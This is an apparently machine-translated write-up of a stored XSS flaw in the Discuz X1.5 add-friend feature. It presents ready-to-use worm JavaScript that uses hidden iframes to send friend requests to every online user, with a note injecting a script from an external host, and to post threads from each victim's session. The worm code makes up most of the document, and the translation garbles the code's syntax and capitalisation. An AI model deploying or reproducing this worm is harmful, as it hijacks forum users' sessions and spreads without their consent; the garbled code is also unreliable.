Discuz X1.5 uses adding friends to store xss for worm Spread
Discuz X1.5 stores xss at the place where friends are added. xss interacts with users to spread the worm index.
Position: Add a friend
Effect after x
Triggered after clicking
OK with the help of this storage xss, we conduct worm propagation, dz session cookies are wounded http-only,However, the effect of xss is to obtain the user session permissions in your current domain.. This does not interfere with our worm operations.
Step 1: attacker sends xss worm payload to user,
Step 2: After you click "A", add other people as friends as the host and attach the payload attack.
Step 3: users infected with each other grow exponentially. to verify that all infected users are controlled by js and post
No code to say a jb. The worm code is as follows:
You need to modify
1 urlBase: The base address of your 1.5 Forum
2. Address for storing the xss payload
// Code for xss test // The base address of the Forum var urlBase =" http://forum.xxx.com "; Var add = function (uid) {var ifBox = window ['ifbox'] | (window ['ifbox'] = {}); var uyk = (new Date ()). getTime (); var ifFame = ifBox [uyk] = document. createElement ("iframe"); ifFame. src = urlBase + "/home. php? Mod = spacecp & ac = friend & op = add & uid = "+ uid; ifFame. width = 0; ifFame. height = 0; ifFame. onload = function () {try {// address for storing xss payload ifFame. contentDocument. getElementsByName ("note") [0]. value = 'Hello <script src =" http://xxx.xxx.xxx/js/dz.js "> </Script> '; ifFame. contentDocument. getElementById ("addsubmit_btn "). click (); ifFame = null;} catch (err) {}} document. body. appendChild (ifFame);} var newThread = function () {var if1 = document. createElement ("iframe"); if1.src = urlBase + "/forum. php? Mod = post & action = newthread & fid = 21 "; if1.width = 0; if1.height = 0; if1.onload = function () {var doc = if1.contentDocument; doc. getElementById ("subject "). value = "kakaka ~~~ "; If1.contentDocument. getElementById ("e_iframe "). contentDocument. body. innerHTML = "_______________ </br> <XSS Worm Test> </br> ------------- </br> \^__^ </br> \ (oo) \ _______ </br> (_) \/\ </br> | ---- w | </br> |||</br> "; doc. getElementById ("postsubmit "). click (); if1.onload = function () {return false ;}} document. body. appendChild (if1);} var if0 = document. createElement ("iframe"); if0.src = urlBase + "/Forum. php? Showoldetails = yes # online "; if0.width = 0; if0.height = 0; if0.onload = function () {var uli = if0.contentDocument. getElementsByTagName ("li"); for (var I = 0; I <uli. length; I ++) {if (uli [I]. title. length> 5) {var uid = uli [I]. childNodes [3]. href. substring (uli [I]. childNodes [3]. href. indexOf ("uid =") + 4); var r = Math. round (Math. random () * 10); // if (I % 10 = r) {// click newThread (); add (uid); // }}} document. body. appendChild (if0 );
Many pitfalls include asynchronous js loading and cross-iframe element operations. I hope to help others.